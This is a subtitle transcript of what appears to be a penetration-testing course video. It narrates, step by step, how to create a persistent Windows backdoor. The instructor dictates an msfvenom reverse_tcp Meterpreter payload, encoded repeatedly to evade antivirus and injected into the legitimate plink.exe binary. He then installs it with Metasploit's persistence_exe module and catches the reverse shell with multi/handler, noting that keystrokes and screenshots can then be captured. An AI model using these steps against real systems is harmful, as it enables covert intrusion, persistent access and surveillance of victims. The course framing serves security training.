1
00:00:00,300 --> 00:00:05,990
OK, so one other thing that we can do that's very helpful with Meterpreter is actually installing

2
00:00:06,000 --> 00:00:06,590
a backdoor.

3
00:00:06,900 --> 00:00:11,060
So when you gain access to a host like we do have now, you know, you want to make sure that you can

4
00:00:11,070 --> 00:00:12,060
retain your access.

5
00:00:12,420 --> 00:00:16,120
And one way that you do this is installing backdoors.

6
00:00:16,170 --> 00:00:21,330
This is pretty much just a change to the computer to ensure that you can always get back in.

7
00:00:21,360 --> 00:00:26,100
So let's go in and check how Meterpreter can allow us to create somewhat of a backdoor.

8
00:00:26,270 --> 00:00:29,580
OK, so let's go ahead and try to get this backdoor set up.

9
00:00:29,580 --> 00:00:30,350
So it's pretty neat.

10
00:00:30,630 --> 00:00:36,300
So I'm in Meterpreter, or I'm in Metasploit, and I did the sessions command.

11
00:00:36,530 --> 00:00:39,600
You have a session right now over 80.

12
00:00:39,600 --> 00:00:41,020
That's pretty much what we just did.

13
00:00:41,340 --> 00:00:46,440
So what we're going to do is we're going to actually create another executable and then we're going

14
00:00:46,440 --> 00:00:48,700
to inject that over and have our backdoor.

15
00:00:48,960 --> 00:00:52,880
So the first thing that we're going to want to do, you remember that photo that I showed you guys?

16
00:00:52,890 --> 00:00:54,950
It had a bunch of Windows binaries in it.

17
00:00:55,230 --> 00:00:56,390
We're going to use one of those.

18
00:00:57,000 --> 00:00:58,650
So we're going to create another malware

19
00:00:58,650 --> 00:01:00,420
using something in there with msfvenom.

20
00:01:01,770 --> 00:01:08,670
So I'm going to do something a little bit new when it comes to msfvenom.
21
00:01:09,060 --> 00:01:18,420
So let's just open up a new tab here, so we'll see msfvenom, and then we're going to do -p, then this is

22
00:01:18,420 --> 00:01:19,030
the payload.

23
00:01:19,050 --> 00:01:23,100
So windows/meterpreter/reverse

24
00:01:23,100 --> 00:01:25,920
_tcp. There we go.

25
00:01:26,190 --> 00:01:34,740
And then we're going to put our LHOST, just the usual one on the one six eight five six seven oh. Port,

26
00:01:34,830 --> 00:01:37,980
this time we're going to set our port to 443.

27
00:01:37,990 --> 00:01:41,400
So that's the port that we're going to be listening over. -e,

28
00:01:41,400 --> 00:01:47,130
we're going to use the same exact encoder, because that's going to help us get past the antivirus.

29
00:01:47,580 --> 00:01:55,380
So shikata_ga_nai, and then we're going to do, we're going to iterate through nine times this time to obfuscate

30
00:01:55,380 --> 00:01:59,180
it a little bit more, help protect us from that maybe just a little bit more.

31
00:01:59,850 --> 00:02:03,420
The file type is going to be exe this time.

32
00:02:03,840 --> 00:02:11,460
We're actually going to do a -x, and this is going to allow us to pick a file to actually inject

33
00:02:11,460 --> 00:02:13,280
our payload into that we're creating.

34
00:02:13,530 --> 00:02:23,000
So in this case, we're going to do /usr/share/windows-resources/binaries/

35
00:02:23,010 --> 00:02:28,050
plink.exe, that's what we're going to use, and then we're going to do a -o and just say,

36
00:02:28,170 --> 00:02:29,160
hey, output it.

37
00:02:29,160 --> 00:02:37,560
We're just going to call it tcp.exe, and then hit enter, and then it should work out in about a minute

38
00:02:37,560 --> 00:02:41,870
or two, and then we're going to hop back into Metasploit.

39
00:02:42,090 --> 00:02:43,800
OK, so I'm back in Metasploit.
40
00:02:44,400 --> 00:02:50,610
So now we're going to go ahead and use the module that's going to allow us to install a backdoor.

41
00:02:50,880 --> 00:02:59,040
So that's going to be use post/windows/manage/persistence

42
00:03:00,660 --> 00:03:06,040
_exe, you see, there you go.

43
00:03:06,390 --> 00:03:09,540
So now we're here, so we're going to do options.

44
00:03:09,910 --> 00:03:16,020
We've got two new options, spelled it correctly, and as you can see, we already have some stuff set up

45
00:03:16,020 --> 00:03:16,260
here.

46
00:03:16,890 --> 00:03:21,120
So what you're going to want to do is set the REXEPATH.

47
00:03:21,450 --> 00:03:26,760
So set, this is just the payload that we created, so set.

48
00:03:26,760 --> 00:03:28,290
So you just do whatever it is.

49
00:03:28,290 --> 00:03:36,110
So for me, it is /home/kali/payloads/tcp.exe.

50
00:03:36,720 --> 00:03:38,070
So that's already set for me.

51
00:03:38,070 --> 00:03:39,360
And then SESSION also.

52
00:03:39,390 --> 00:03:45,120
So you see up here when I did the sessions command, we have an ID number for the session.

53
00:03:45,300 --> 00:03:47,440
We need this session open in order to do this.

54
00:03:47,740 --> 00:03:53,730
So right now it's 11, so I'm going to set the session to 11.

55
00:03:55,070 --> 00:03:57,570
And then we're good to go after that.

56
00:03:57,590 --> 00:04:01,590
So now all you have to do is type in exploit and you'll be good to go.

57
00:04:01,610 --> 00:04:06,830
It's going to go through, and what it's doing is going to the machine using the session, it's copying

58
00:04:06,830 --> 00:04:12,500
this file over and putting it somewhere where it's going to automatically run whenever the system is

59
00:04:12,500 --> 00:04:13,100
booted up.
60
00:04:13,430 --> 00:04:20,720
And the way that you can actually test this out is to go to that Windows machine, reboot it and log

61
00:04:20,720 --> 00:04:21,230
back in.

62
00:04:21,800 --> 00:04:24,980
And then, but you also want to start a handler here.

63
00:04:24,980 --> 00:04:29,920
So once this is done, we're going to start a handler and we're going to be listening for the connection.

64
00:04:29,940 --> 00:04:34,750
So whenever they log back in, it's going to be trying to, like, reach out to us.

65
00:04:35,060 --> 00:04:35,930
So let's see.

66
00:04:35,930 --> 00:04:40,370
Let's go to use multi/handler.

67
00:04:43,350 --> 00:04:48,040
So now we already have our payload set, just do options real quick to make sure we're good to go.

68
00:04:48,060 --> 00:04:53,900
So here we're going to want to set our LPORT to 443, because that's the port that our

69
00:04:53,910 --> 00:04:56,430
payload is trying to reach out to us over.

70
00:04:57,090 --> 00:05:01,020
And outside of that, we don't really have to do much except hit run and then wait for it.

71
00:05:01,260 --> 00:05:05,940
And all you have to do is really, if you reboot the Windows machine,

72
00:05:07,390 --> 00:05:15,700
it will attempt, well, pretty much when it starts up it will run the file and then it will start beaconing

73
00:05:15,700 --> 00:05:18,830
out to you and then you'll get a shell pretty much.

74
00:05:18,850 --> 00:05:24,190
So you just run this within the machine and you kind of just wait.

75
00:05:24,490 --> 00:05:26,540
OK, so we restarted the machine.

76
00:05:26,560 --> 00:05:30,370
I waited a couple of minutes and now we have some Meterpreter sessions going.

77
00:05:30,370 --> 00:05:34,000
So you might see that it opens up a couple or quite a few.

78
00:05:34,660 --> 00:05:35,450
I don't know.

79
00:05:35,480 --> 00:05:37,630
I think it's because I've done this multiple times.

80
00:05:37,630 --> 00:05:38,440
I didn't clean it up.
81
00:05:38,620 --> 00:05:45,310
But when you do it, you'll see that you have the shell, type in like help, and you have full access and

82
00:05:45,310 --> 00:05:46,610
you do everything that you need to do.

83
00:05:46,630 --> 00:05:50,110
You can start watching the keystrokes.

84
00:05:50,110 --> 00:05:53,630
You could take screenshots, you can do all kinds of stuff.

85
00:05:53,890 --> 00:05:58,390
So now you know how to create a backdoor that's going to be persistent no matter what.

86
00:05:58,390 --> 00:06:01,330
And you always have access to that machine.

87
00:06:02,200 --> 00:06:07,750
OK, so now we know how to get into a network, we know how to conduct post-exploitation activities,

88
00:06:07,750 --> 00:06:12,570
we know how to create backdoors, so we know how to hack into networks.

89
00:06:12,580 --> 00:06:18,700
And now it's up to you to kind of take those skills and foster them, try a lot of the different

90
00:06:18,700 --> 00:06:21,700
commands that we didn't do, just experiment a little bit.

91
00:06:21,730 --> 00:06:26,560
So the next thing we need to do is actually go over how to hack into web applications.

92
00:06:26,770 --> 00:06:28,900
So I appreciate you listening so far.

93
00:06:28,960 --> 00:06:30,400
And I'll see you guys in the next section.